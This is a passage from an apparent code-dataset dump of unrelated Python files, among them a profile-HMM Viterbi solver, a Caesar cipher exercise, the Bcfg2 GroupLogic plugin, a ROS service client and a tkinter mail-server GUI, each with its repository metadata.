Σ, followed by a multiple alignment Alignment whose strings are formed from Σ.\nOutput: An optimal hidden path emitting x in HMM(Alignment, θ, σ).\n\nSample Input:\n\nAEFDFDC\n--------\n0.4 0.01\n--------\nA B C D E F\n--------\nACDEFACADF\nAFDA---CCF\nA--EFD-FDC\nACAEF--A-C\nADDEFAAADF\n\nSample Output:\n\nM1 D2 D3 M4 M5 I5 M6 M7 M8\n\"\"\"\n\n\nfile = open(\"SeqAlignProfileHMM_sample.txt\", \"r\")\nfile = open(\"SeqAlignProfileHMM_test.txt\", \"r\")\nfile = open(\"dataset_397441_14.txt\", \"r\")\ndata = file.readlines()\nstring = data[0].strip('\\n')\nthreshold = float(data[2].strip('\\n').split(' ')[0]) \npseudocount = float(data[2].strip('\\n').split(' ')[1]) \n\nalphabet = data[4].strip('\\n').split(' ')\n\nAlignment = []\nfor d in data[6:]: \n\tAlignment.append(d.strip('\\n'))\n# print(Alignment)\n\ndef identify_removed_columns(threshold, Alignment): \n\t\n\tremoved_columns = []\n\tfor column in range(len(Alignment[0])): \n\t\tcount = 0 \n\t\tfor sequence in Alignment: \n\t\t\tif sequence[column] == '-': \n\t\t\t\tcount += 1 \n\t\tif count / len(Alignment) >= threshold: \n\t\t\tremoved_columns.append(column)\n\n\treturn removed_columns\n\ndef construct_transition_matrix_with_pseudocounts(States, Alignment, removed_columns, pseudocount): \n\n\ttotal_count = np.zeros((len(States), len(States)))\n\ttransition = copy(total_count)\n\tPaths = []\n\tfor sequence in Alignment: \n\n\t\tcount = np.zeros((len(States), len(States)))\n\t\tpath = []; State_idx = 0 \n\t\tfor idx, letter in enumerate(sequence): \n\t\t\tif idx == 0: \n\t\t\t\tpath.append(States[State_idx])\n\t\t\tif idx in removed_columns: \n\t\t\t\tif letter in alphabet: \n\t\t\t\t\tif State_idx == 0: \n\t\t\t\t\t\tpath.append(States[State_idx+1])\n\t\t\t\t\telse: \n\t\t\t\t\t\tif States[State_idx][0] == \"M\": \n\t\t\t\t\t\t\tpath.append(States[State_idx+2])\n\t\t\t\t\t\telif States[State_idx][0] == \"D\": \n\t\t\t\t\t\t\tpath.append(States[State_idx+1])\t\t\t\t\t\t\t\n\t\t\t\t\t\telse: \n\t\t\t\t\t\t\tpath.append(States[State_idx])\n\n\t\t\telse: \n\t\t\t\tif State_idx == 0: \n\t\t\t\t\tState_idx += 2\n\t\t\t\telse:\n\t\t\t\t\tif States[State_idx][0] == \"I\": \n\t\t\t\t\t\tState_idx += 1 \n\t\t\t\t\telif States[State_idx][0] == \"D\": \n\t\t\t\t\t\tState_idx += 2\n\t\t\t\t\telse: #States[State_idx][0] == \"M\": \n\t\t\t\t\t\tState_idx += 3 
\n\t\t\t\tif letter == \"-\": \n\t\t\t\t\tpath.append(States[State_idx+1])\n\t\t\t\telse: \n\t\t\t\t\tpath.append(States[State_idx])\n\n\t\tpath.append(States[-1])\n\t\tPaths.append(path)\n\t\tfor i in range(len(path)-1): \n\t\t\tcount[States.index(path[i])][States.index(path[i+1])] += 1 \n\t\t# print(count)\n\t\ttotal_count += count \n\t\t# print(path)\n\t# print(total_count)\n\tfor idx, state_trans_counts in enumerate(total_count):\n\t\tif np.sum(state_trans_counts) != 0: \n\t\t\ttransition[idx] = np.round(state_trans_counts / np.sum(state_trans_counts),3) \n\t# print(transition)\n\n\t# Add pseudocounts\n\trow_start_idx = [0, 2]\n\twhile row_start_idx[-1] + 3 != len(States)-1: \n\t\trow_start_idx.append(row_start_idx[-1]+3)\n\tcol_start_idx = [1]\n\twhile col_start_idx[-1] + 3 != len(States)+1: \n\t\tcol_start_idx.append(col_start_idx[-1]+3)\n\t# print(row_start_idx, col_start_idx)\n\tfor rowidxs, colidxs in zip(row_start_idx, col_start_idx): \n\t\tif rowidxs == 0: \n\t\t\tnumrows = 2\n\t\telse: \n\t\t\tnumrows = 3\n\t\tif colidxs == len(States) - 2: \n\t\t\tnumcols = 2 \n\t\telse: \n\t\t\tnumcols = 3 \n\t\tfor i in range(rowidxs, rowidxs + numrows): \n\t\t\tfor j in range(colidxs, colidxs + numcols): \n\t\t\t\ttransition[i][j] += pseudocount\n\n\t#normalize transition matrix \n\tfor idx, trans in enumerate(copy(transition)):\n\t\tif np.sum(trans) != 0: \n\t\t\ttransition[idx] = np.round(trans / np.sum(trans),3)\n \n\n\n\treturn \ttransition, Paths\n\ndef construct_emission_matrix_with_pseudocounts(States, alphabet, Alignment, Paths, removed_columns, pseudocount): \n\n\temission = np.zeros((len(States), len(alphabet)))\n\tcount = copy(emission)\n\tfor idx1, sequence in enumerate(Alignment): \n\t\tidx_str = 0 \n\t\tfor idx2, letter in enumerate(sequence): \n\t\t\tif letter in alphabet: \n\t\t\t\tcount[States.index(Paths[idx1][1:-1][idx2-idx_str])][alphabet.index(letter)] \\\n\t\t\t\t+= 1 \n\t\t\telif letter == '-' and idx2 in removed_columns: \n\t\t\t\tidx_str += 1 \n\t\t\telse: \n\t\t\t\tpass\n\tfor idx, state_emiss_counts in enumerate(count):\n\t\tif np.sum(state_emiss_counts) != 0: \n\t\t\temission[idx] = np.round(state_emiss_counts / np.sum(state_emiss_counts), 3)\n\n\n\tfor i in range(len(States)): \n\t\tfor j in range(len(alphabet)): \n\t\t\tif States[i][0] in [\"I\", \"M\"]: \n\t\t\t\temission[i][j] += pseudocount\n\n\t#normalize emission matrix \n\tfor idx, emiss in enumerate(copy(emission)):\n\t\tif np.sum(emiss) != 0: \n\t\t\temission[idx] = np.round(emiss / np.sum(emiss),3)\n\n\treturn emission\n\ndef score_ProfileHMM_ViterbiGraph(States, transition, emission, string, alphabet): \n\n\ts = np.zeros((len(States), len(string) + 1 + 1))\n\tbacktrack = np.zeros((len(States), len(string) + 1 + 1, 2)) #holds indicies of node to backtrack to \n\ts[0,0] = 1 \n\tfor j in range(s.shape[1]): #emissions \n\t\tif j > 0 and j < len(string) + 1: \n\t\t\tletter_idx = alphabet.index(string[j-1])\n\t\tfor i in range(s.shape[0]): #states \n\t\t\tstate = States[i]\n\t\t\tif state == 'S': \n\t\t\t\tcontinue\n\t\t\tif j == 0 and state[0] != 'D': \n\t\t\t\tcontinue \n\t\t\tif j == s.shape[1] - 1 and state != \"E\":\n\t\t\t\tcontinue \n\t\t\tif j != s.shape[1] - 1 and state == \"E\":\n\t\t\t\tcontinue\n\n\t\t\tif j == 0: # First column of D's \n\t\t\t\ts[i][j] = s[i-3][j]*transition[i-3][i]\n\t\t\t\tbacktrack[i][j] = [i-3, j]\n\t\t\t\tcontinue \n\n\t\t\tif j == 1: \n\t\t\t\tif state[0] == \"I\": \n\t\t\t\t\ts[i][j] = s[i-1][j-1] * transition[i-1][i]*emission[i][letter_idx]\n\t\t\t\t\tbacktrack[i][j] = 
[i-1, j-1]\n\t\t\t\telif state[0] == \"M\": \n\t\t\t\t\ts[i][j] = s[i-2][j-1] * transition[i-2][i]*emission[i][letter_idx]\n\t\t\t\t\tbacktrack[i][j] = [i-2, j-1]\n\t\t\t\telse: # Deletion States \n\t\t\t\t\tif state == \"D1\": \n\t\t\t\t\t\ts[i][j] = s[i-2][j]*transition[i-2][i]\n\t\t\t\t\t\tbacktrack[i][j] = [i-2, j]\n\t\t\t\t\telse:\n\t\t\t\t\t\tscores = [s[i-4][j]*transition[i-4][i], s[i-3][j]*transition[i-3][i], \\\n\t\t\t\t\t\ts[i-2][j]*transition[i-2][i]]\n\t\t\t\t\t\ts[i][j] = max(scores)\n\t\t\t\t\t\tbacktrack[i][j] = [i-(4 - scores.index(max(scores))), j] \n\t\t\telse: \n\t\t\t\tif state[0] == \"I\": \n\t\t\t\t\tif state == \"I0\": \n\t\t\t\t\t\ts[i][j] = s[i][j-1] * transition[i][i]*emission[i][letter_idx]\n\t\t\t\t\t\tbacktrack[i][j] = [i, j-1]\n\t\t\t\t\telse: \n\t\t\t\t\t\tscores = [s[i-2][j-1] * transition[i-2][i]*emission[i][letter_idx], s[i-1][j-1] * transition[i-1][i]*emission[i][letter_idx], \\\n\t\t\t\t\t\ts[i][j-1] * transition[i][i]*emission[i][letter_idx]]\n\t\t\t\t\t\ts[i][j] = max(scores)\n\t\t\t\t\t\tbacktrack[i][j] = [i-(2 - scores.index(max(scores))), j-1]\n\t\t\t\telif state[0] == \"M\": \n\t\t\t\t\tif state == \"M1\": \n\t\t\t\t\t\ts[i][j] = s[i-1][j-1] * transition[i-1][i]*emission[i][letter_idx]\n\t\t\t\t\t\tbacktrack[i][j] = [i-1, j-1]\n\t\t\t\t\telse: \n\t\t\t\t\t\tscores = [s[i-3][j-1] * transition[i-3][i]*emission[i][letter_idx], s[i-2][j-1] * transition[i-2][i]*emission[i][letter_idx], \\\n\t\t\t\t\t\ts[i-1][j-1] * transition[i-1][i]*emission[i][letter_idx]]\n\t\t\t\t\t\ts[i][j] = max(scores)\n\t\t\t\t\t\tbacktrack[i][j] = [i-(3 - scores.index(max(scores))), j-1]\n\t\t\t\telif state == \"E\": \n\t\t\t\t\t\tscores = [s[i-3][j-1], s[i-2][j-1], \\\n\t\t\t\t\t\ts[i-1][j-1]]\n\t\t\t\t\t\ts[i][j] = max(scores)\n\t\t\t\t\t\tbacktrack[i][j] = [i-(3 - scores.index(max(scores))), j-1]\n\t\t\t\telse: # Deletion States \n\t\t\t\t\tif state == \"D1\": \n\t\t\t\t\t\ts[i][j] = s[i-2][j]*transition[i-2][i]\n\t\t\t\t\t\tbacktrack[i][j] = [i-2, j]\n\t\t\t\t\telse:\n\t\t\t\t\t\tscores = [s[i-4][j]*transition[i-4][i], s[i-3][j]*transition[i-3][i], \\\n\t\t\t\t\t\ts[i-2][j] * transition[i-2][i]]\n\t\t\t\t\t\ts[i][j] = max(scores)\n\t\t\t\t\t\tbacktrack[i][j] = [i-(4 - scores.index(max(scores))), j]\t\t\t\t\n\treturn s, backtrack\n\ndef backtrack_profileHMM_Viterbi(backtrack, States, state, column): \n\t# print(state, column, States[state])\n\tif States[state] != \"S\": \n\t\tbacktrack_profileHMM_Viterbi(backtrack, States, int(backtrack[state][column][0]), int(backtrack[state][column][1]))\n\t\tif States[state] != \"E\": \n\t\t\tprint(States[state], end=' ')\n\telse: \n\t\treturn \n\n\nremoved_columns = identify_removed_columns(threshold, Alignment)\n# print(removed_columns)\n# Create states list \nStates = ['S', 'I0']\nfor num in range(1, len(Alignment[0]) - len(removed_columns) + 1): \n\tStates.append('M' + str(num))\n\tStates.append('D' + str(num))\n\tStates.append('I' + str(num))\nStates.append('E')\n# print(States)\ntransition, Paths = construct_transition_matrix_with_pseudocounts(States, Alignment, removed_columns, pseudocount)\n# print(transition)\n# print(Paths)\n# print(States, alphabet)\nemission = construct_emission_matrix_with_pseudocounts(States, alphabet, Alignment, Paths, removed_columns, pseudocount)\n# print(emission)\n# Output results \ns, backtrack = score_ProfileHMM_ViterbiGraph(States, transition, emission, string, alphabet)\n# print(string)\nbacktrack_profileHMM_Viterbi(backtrack, States, len(States)-1, s.shape[1]-1)\n# print(s[-1][-1])\n# 
print(States)\n# print(np.round(s.T, 3))\n# Path = [\"S\", \"M1\", \"D2\", \"D3\", \"M4\", \"M5\", \"I5\", \"M6\", \"M7\", \"M8\", \"E\"]\n\n# score = 0\n# old_state = \"S\"\n# j = -1\n# for state in Path[1:-1]: \n# \tif state[0] != \"D\": \n# \t\tj += 1\n# \tstate_idx = Path.index(state)\n# \tprev_state_idx = Path.index(old_state)\n# \tscore += transition[prev_state_idx][state_idx] * emission[state_idx][alphabet.index(string[j])]\n# \told_state = copy(state)\n\t \n# print(score)","repo_name":"osarwar/BioinformaticsAlgorithms","sub_path":"5 - HMMs for Alignment & Protein Classification/SeqAlignProfileHMM.py","file_name":"SeqAlignProfileHMM.py","file_ext":"py","file_size_in_byte":9393,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"4955058295","text":"#!/usr/bin/env python3\n# รัฏชพล ปุกคำ\n# 620510660\n# Lab 06\n# Problem 1\n# 204113 Sec 002\nimport time\nimport datetime\nfrom pylab import *\ndef main():\n n = int(input())\n rand_float(n)\ndef rand_float(n):\n x = (int)(time.time()) \n l = []\n for i in range(n):\n y = datetime.datetime.now()\n a = (int)(y.microsecond) \n m = (int)(y.minute*y.second)\n c = (int)(y.minute*y.second)\n xn = (a*x+c) % m\n xn = xn/m\n l.append(xn) \n x = xn #เปลี่ยนseedไปเรื่อยๆ\n plot(l,'ro')\n show()\n print(\"สวัสดีตอนง่วง\")\n \nif __name__ == '__main__' :\n main()\n \n","repo_name":"kenmono/hello_world_01","sub_path":"Lab05_1_620510660.py","file_name":"Lab05_1_620510660.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"19095815487","text":"import textwrap\n\nimport praw\nimport sys\n\nfrom Api import ConkyWriter\nfrom random import choice\nimport argparse\n\n# choose subreddit\nparser = argparse.ArgumentParser()\nparser.add_argument(\"subreddit\")\nsub = parser.parse_args().subreddit\nreddit = praw.Reddit(\"Dimdalf reddit\")\nsubmissions = list(reddit.get_subreddit(sub).get_hot())\n\n# choose a color\nmy_little_colors = ['aquamarine', 'chartreuse', 'chocolate', 'deepskyblue', 'firebrick', 'darkorange']\ncolor = choice(my_little_colors)\nmy_little_colors = my_little_colors.remove(color)\n\n# setup writter\nWriter = ConkyWriter()\n\n# constants\nBREAK_LENGTH = 40\n\nsubmission = \"\"\nfor submission in submissions:\n if not submission.stickied:\n break\n\n\nquote = submission.title\n\nquotes = textwrap.wrap(quote, BREAK_LENGTH)\n\nquotes.insert(0, sub.capitalize()+\":\")\nfor color_index, line in enumerate(quotes):\n Writer.voffset(8).offset(16).color(color+str(color_index+1)).write(line).newline()\n","repo_name":"alskgj/conky_stuff","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"45178445446","text":"#name error -> sintaxe\n#value error -> erro de valor int() -> str()\n#zero division error -> divisão por 0 =!\n#type error -> str -> int\n#index error -> lst fora de range\n#moduleNotfound -> modulo nao encontrado\n#key error -> erro de chave\n#keyboardInterrupt -> usuario para o programa\n#memoryError -> erro de variavel\n#connection error -> \n#runtime error -> erro de run\n\ntry:\n a = int(input('Digite o valor: '))\n b = int(input('Digite um valor: '))\n c = a/b\nexcept (ValueError, TypeError):\n print('Tivemos um problema com os tipos de dados que voce digitou.')\nexcept ZeroDivisionError:\n print('nao é possivel dividir um numero zero!')\nexcept 
KeyboardInterrupt:\n print('O usuario preferiu nao informar os dados. ')\nexcept Exception as erro:\n print(f'O erro encontrado foi {erro.__cause__}, {erro}')\n# except Exception as erro:\n# print(f'Problema encontrado foi {erro},{erro.__class__} :')# Para mostrar aonde esta o erro, apenas coloque a variavel 'Erro'\n \nelse:\n print(c)\nfinally:\n print('Volte sempre')","repo_name":"Vinicius-Nunez/Aprendendo-Python","sub_path":"Aulas/aula23-tratamento-de-Erro.py","file_name":"aula23-tratamento-de-Erro.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70622371245","text":"\"\"\" GroupLogic is a connector plugin that lets you use an XML Genshi\ntemplate to dynamically set additional groups for clients. \"\"\"\n\nimport os\nimport lxml.etree\nfrom threading import local\nimport Bcfg2.Server.Plugin\nfrom Bcfg2.Server.Plugins.Metadata import MetadataGroup\n\n\nclass GroupLogicConfig(Bcfg2.Server.Plugin.StructFile):\n \"\"\" Representation of the GroupLogic groups.xml file \"\"\"\n create = lxml.etree.Element(\"GroupLogic\",\n nsmap=dict(py=\"http://genshi.edgewall.org/\"))\n\n def __init__(self, filename, core):\n Bcfg2.Server.Plugin.StructFile.__init__(self, filename,\n should_monitor=True)\n self.core = core\n\n def Index(self):\n Bcfg2.Server.Plugin.StructFile.Index(self)\n\n if self.core.metadata_cache_mode in ['cautious', 'aggressive']:\n self.core.metadata_cache.expire()\n\n def _match(self, item, metadata, *args):\n if item.tag == 'Group' and not len(item.getchildren()):\n return [item]\n return Bcfg2.Server.Plugin.StructFile._match(self, item, metadata,\n *args)\n\n def _xml_match(self, item, metadata, *args):\n if item.tag == 'Group' and not len(item.getchildren()):\n return [item]\n return Bcfg2.Server.Plugin.StructFile._xml_match(self, item, metadata,\n *args)\n\n\nclass GroupLogic(Bcfg2.Server.Plugin.Plugin,\n Bcfg2.Server.Plugin.Connector):\n \"\"\" GroupLogic is a connector plugin that lets you use an XML\n Genshi template to dynamically set additional groups for\n clients. \"\"\"\n # perform grouplogic later than other Connector plugins, so it can\n # use groups set by them\n sort_order = 1000\n\n def __init__(self, core):\n Bcfg2.Server.Plugin.Plugin.__init__(self, core)\n Bcfg2.Server.Plugin.Connector.__init__(self)\n self.config = GroupLogicConfig(os.path.join(self.data, \"groups.xml\"),\n core=core)\n self._local = local()\n\n def get_additional_groups(self, metadata):\n if not hasattr(self._local, \"building\"):\n # building is a thread-local set that tracks which\n # machines GroupLogic is getting additional groups for.\n # If a get_additional_groups() is called twice for a\n # machine before the first call has completed, the second\n # call returns an empty list. 
This is for infinite\n # recursion protection; without this check, it'd be\n # impossible to use things like metadata.query.in_group()\n # in GroupLogic, since that requires building all\n # metadata, which requires running\n # GroupLogic.get_additional_groups() for all hosts, which\n # requires building all metadata...\n self._local.building = set()\n if metadata.hostname in self._local.building:\n return []\n self._local.building.add(metadata.hostname)\n rv = []\n for el in self.config.XMLMatch(metadata).findall(\"Group\"):\n if el.get(\"category\"):\n rv.append(MetadataGroup(el.get(\"name\"),\n category=el.get(\"category\")))\n else:\n rv.append(el.get(\"name\"))\n self._local.building.discard(metadata.hostname)\n return rv\n","repo_name":"Bcfg2/bcfg2","sub_path":"src/lib/Bcfg2/Server/Plugins/GroupLogic.py","file_name":"GroupLogic.py","file_ext":"py","file_size_in_byte":3455,"program_lang":"python","lang":"en","doc_type":"code","stars":93,"dataset":"github-code","pt":"19"} +{"seq_id":"35555212472","text":"alphabets = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\n\n#direction = input(\"Type 'encode' to encrypt, type 'decode' to decrypt:\\n\")\n# text = input(\"Type your message:\\n\").lower()\n# shift = int(input(\"Type the shift number:\\n\"))\n\n# Don't change the code above\n#########################################################\n# function to encrypt text\n#def encrypt(plain_text, shift_number):\n# shift_index = []\n# encrypted_word = \"\"\n# for letter in text:\n# letter_index = alphabets.index(letter)\n# letter_index += shift\n# letter_index %= 26\n# encrypted_word += alphabets[letter_index]\n \n# print(f\"The encoded text is {encrypted_word}\")\n\n# function to decrypt text\n#def decrypt(cipher_text, shift_number):\n# decrypted_word = \"\"\n# for letter in cipher_text:\n# letter_index = alphabets.index(letter)\n# letter_index = abs(letter_index - shift)\n# letter_index %= 26\n# decrypted_word += alphabets[letter_index]\n# print(f\"Your decoded text is {decrypted_word}\")\n#######################################################3\n\ndef caesar(text, shift, direction):\n # to hold the final result\n result = \"\"\n # to hold index of letter in alphabet list\n alpha_position = 0\n # to hold letter position after operation performed\n new_position = 0\n for letter in text:\n # for whitespaces\n if letter not in alphabets:\n result += letter\n continue\n # get hold of index of letter in alphabets list\n alpha_position = alphabets.index(letter)\n if direction == \"encode\":\n # for encoding, shift letter position to the right\n new_position = alpha_position + shift\n new_position %= 26\n elif direction == \"decode\":\n # for decoding, shift letter position to the left\n new_position = alpha_position - shift\n new_position %= 26\n result += alphabets[new_position]\n print(f\"The final output is:\\n{result}\")\n \n# to check if user wants to quit\nis_end = False\n\nwhile is_end == False:\n direction = input(\"Type 'encode' to encrypt, type 'decode' to decrypt:\\n\")\n text = input(\"Type your message:\\n\").lower()\n shift = int(input(\"Type the shift number:\\n\"))\n\n caesar(text, shift, direction)\n\n response = input(\"Would like to go again? 
(yes/no)\\n\")\n if response == \"no\":\n print(\"Goodbye!\")\n is_end = True\n elif response != \"yes\":\n print(\"Enter the right thing for once in your miserable life!\")\n is_end = True\n","repo_name":"dojjo-corp/100-days-of-code-python","sub_path":"beginners/day_8/encrypt.py","file_name":"encrypt.py","file_ext":"py","file_size_in_byte":2635,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"36521535866","text":"import pandas as pd\nimport numpy as np\n\n\ndef prep_df(DF, feature_list, index=True):\n \"\"\"\n Returns a numpy of shape (ex, features) from a pandas dataframe\n \"\"\"\n\n # Select features we're interested in.\n sel_DF = DF[feature_list].dropna()\n\n if index:\n return sel_DF.to_numpy(), sel_DF.index\n else:\n return sel_DF.to_numpy()\n\n\ndef prep_df_lags(DF, feature_list, lags, index=True):\n \"\"\"\n Returns a numpy of shape (ex, lags, features) from a pandas dataframe\n \"\"\"\n\n # Build lag list if lags were specified as an integer\n if type(lags) is int:\n lags = list(range(lags+1))[1:]\n\n # Stack lagged slices\n res_npy = []\n for feature in feature_list:\n lagged_features = []\n for lag in lags:\n lagged_features.append(DF[feature].shift(lag))\n lag_features = pd.concat(lagged_features, axis=1).dropna()\n res_npy.append(lag_features)\n\n # Build a common index\n common_idx = res_npy[0].index\n for feat in res_npy:\n common_idx = common_idx.intersection(feat.index)\n\n # Normalize the index\n for i in range(len(res_npy)):\n res_npy[i] = res_npy[i].loc[common_idx].to_numpy()\n\n # Build result array\n res_npy = np.stack(res_npy, axis=1)\n\n # Return dataset and possibly index\n if index:\n return res_npy, common_idx\n else:\n return res_npy\n","repo_name":"ncsa/DRYML","sub_path":"src/dryml/data/pandas/prep_funcs.py","file_name":"prep_funcs.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"34223866990","text":"def parse_command(text: str, entities : list[str]) -> (str, str, bool):\n entity = \"\"\n state = \"\"\n states = [\"an\", \"aus\", \"on\", \"off\"]\n for s in states:\n if s in text:\n state = s\n break\n for e in entities:\n if e in text:\n entity = e\n break\n\n found = (entity != \"\" and state != \"\")\n return entity, state, found\n\n\nif __name__ == '__main__':\n entities = [\"nachtlicht\", \"stern\"]\n assert parse_command(\"mach das nachtlicht an\", entities) == (\"nachtlicht\", \"an\", True)\n assert parse_command(\"stern aus\", entities) == (\"stern\", \"aus\", True)\n assert parse_command(\"stern\", entities) == (\"stern\", \"\", False)","repo_name":"CHC0815/assistant","sub_path":"src/cmd_parser.py","file_name":"cmd_parser.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"18303220347","text":"# Write your solution here\r\nmy_list = []\r\ni = 1\r\nwhile True:\r\n task = int(input(\"New item:\"))\r\n if task == 0:\r\n print(\"Bye!\")\r\n break\r\n else:\r\n my_list.append(task)\r\n print(\"The list now:\",my_list)\r\n print(\"The list in order:\",sorted(my_list))\r\n","repo_name":"Aten31/Mooc-Python-Learning","sub_path":"list_twice.py","file_name":"list_twice.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"19826540540","text":"import html\nimport requests\nimport pprint\nimport 
os\n\nurl = 'http://10.11.203.199:2224/' \n\ndef main():\n os.system('clear')\n print(\"Welcome to the yugioh search API\")\n choice = input('What would you like to search? [search,imgSearch,typeSearch,priceSearch]')\n if choice == 'search':\n name = input(\"Please input the name of the card you want to search: \")\n query = 'search?name='\n name = html.escape(name)\n pprint.pprint(requests.get(url+query+name).json())\n elif choice == 'imgSearch':\n name = input(\"Please input the name of the card you want to search: \")\n query = 'imgSearch?name='\n name = html.escape(name)\n pprint.pprint(requests.get(url+query+name).json())\n elif choice == 'typeSearch':\n name = input(\"Please enter the type of cards you want to see: [trap card, spell card, normal monster, effect monster, ritual monster, synchro monster, xyz monster, pendulum monster, link monster, fusion monster]: \")\n query = 'typeSearch?type='\n name = html.escape(name)\n pprint.pprint(requests.get(url+query+name).json())\n elif choice == 'priceSearch':\n name = input(\"Please enter a price; cards with an Amazon price at or below it will be listed in descending price order: \")\n query = 'priceSearch?price='\n pprint.pprint(requests.get(url+query+name).json())\n else:\n print(\"That is not a valid input\")\n\nif __name__=='__main__':\n main()\n","repo_name":"jshigetomi/mycode","sub_path":"Mini_Project_3/altaresearch-requests02.py","file_name":"altaresearch-requests02.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"30875010761","text":"#!/usr/bin/env python\n\nimport rospy\nfrom std_msgs.msg import String\nfrom morai_msgs.msg import ScenarioLoad\nfrom morai_msgs.srv import MoraiScenarioLoadSrv\n\ndef srv_client():\n rospy.init_node('ros_client', anonymous=True)\n rospy.wait_for_service('/Service_MoraiSL')\n\n scenario_setting = ScenarioLoad()\n scenario_setting.file_name = \"ssafy_scenario\"\n scenario_setting.load_network_connection_data = False\n scenario_setting.delete_all = False\n scenario_setting.load_ego_vehicle_data = False\n scenario_setting.load_surrounding_vehicle_data = True\n scenario_setting.load_pedestrian_data = True\n scenario_setting.load_obstacle_data = True\n scenario_setting.set_pause = False\n\n rate = rospy.Rate(1) # 1 hz\n while not rospy.is_shutdown():\n try:\n ros_srv = rospy.ServiceProxy('/Service_MoraiSL', MoraiScenarioLoadSrv)\n result = ros_srv(scenario_setting)\n rospy.loginfo(result)\n except rospy.ServiceException as e:\n rospy.logwarn('no response')\n\n rate.sleep()\n\nif __name__ == '__main__':\n try:\n srv_client()\n except rospy.ROSInterruptException:\n pass\n","repo_name":"JYH00N/ssafy_ad","sub_path":"ssafy_1/scripts/1_3_srv_scenario_load.py","file_name":"1_3_srv_scenario_load.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"3403261928","text":"import tkinter as tk\nimport pathlib\nfrom config import MESSAGE_DIR, HOST\nfrom mail_server_tool import run_server\nimport multiprocessing\n\n\nclass Application(tk.Frame):\n is_started = False\n server = None\n\n def __init__(self, master=None):\n super().__init__(master)\n self.master = master\n self.set_options()\n\n self.port_input = None\n self.start = None\n\n self.create_widgets()\n self.pack()\n\n def set_options(self):\n self.master.title('Py Test Mail Server')\n 
self.master.minsize(width=600, height=250)\n self.master.protocol(\"WM_DELETE_WINDOW\", self.on_closing)\n self.master['bg'] = 'black'\n\n def on_closing(self):\n if self.is_started:\n self.server.terminate()\n self.master.destroy()\n\n def create_widgets(self):\n\n port_label = tk.Label(self)\n port_label[\"text\"] = \"Port to listen on: \"\n port_label.grid(sticky=\"W\", row=0, column=1, padx=10, pady=25)\n\n self.port_input = tk.Spinbox(self, width=8, from_=0, to=65535, textvariable=tk.DoubleVar(value=25))\n self.port_input.grid(sticky=\"W\", row=0, column=2, padx=10, pady=25)\n\n output_label = tk.Label(self)\n output_label[\"text\"] = \"Path of received emails: \"\n output_label.grid(sticky=\"W\", row=1, column=1, padx=10, pady=25)\n\n output_input = tk.Entry(self, width=70)\n output_input.insert(0, str(pathlib.Path(__file__).parent.absolute()) + \"\\\\\" + MESSAGE_DIR)\n output_input.grid(row=1, column=2, padx=10, pady=20)\n output_input.bind(\"<Key>\", lambda e: \"break\")\n\n self.start = tk.Button(self, text=\"Start Server\", width=12, height=2,\n command=self.start_server, borderwidth=0, bg='#C6E8E8')\n self.start.grid(row=2, pady=50, columnspan=2, sticky='E')\n\n quit_button = tk.Button(self, text=\"QUIT\", fg=\"red\", width=12, height=2,\n command=self.on_closing, borderwidth=0, bg='#C6E8E8')\n quit_button.grid(row=3, column=2, padx=50, pady=20, columnspan=2, sticky='E')\n\n def start_server(self):\n \"\"\"\n Starts the email server and sets the GUI appropriately.\n \"\"\"\n if self.is_started:\n self.server.terminate()\n self.start[\"text\"] = \"Start Server\"\n self.port_input.config(state='normal')\n else:\n if not self.port_input.get().isdigit():\n return\n\n # Start email server in a separate process\n self.server = multiprocessing.Process(target=run, args=(int(self.port_input.get()),))\n self.server.start()\n self.start[\"text\"] = \"Stop Server\"\n self.port_input.config(state='disabled')\n\n self.is_started = not self.is_started\n\n\ndef run(port):\n \"\"\"\n Runs the server on *port*.\n \"\"\"\n run_server(HOST, port)\n\n\nif __name__ == '__main__':\n root = tk.Tk()\n app = Application(master=root)\n app.mainloop()\n","repo_name":"bxpluse/PyTestMailServer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"7115254794","text":"from io import open\nimport logging\nimport os\nimport subprocess\nimport uuid\n\nfrom mock import patch, Mock\nfrom six import text_type\nimport pytest\n\nimport numpy as np\nimport pybloqs as p\nfrom pybloqs.htmlconv.html_converter import LANDSCAPE, HTMLConverter\n\n\n# set up logging output to help with external function calls\nlogging.basicConfig(level=logging.INFO)\n\nA4_LONG_PTS = 842\nA4_SHORT_PTS = 595\n\n\ndef run_pdfinfo(file_name):\n cmd = [\"pdfinfo\", file_name]\n proc = subprocess.Popen(cmd, stdout=subprocess.PIPE)\n stdout, _ = proc.communicate()\n output = dict([tuple(e.strip() for e in s.decode().split(':', 1)) for s in stdout.splitlines()])\n return output\n\n\ndef run_pdftotext(file_name):\n # PyPDF2 is not successful at reading text test PDF. 
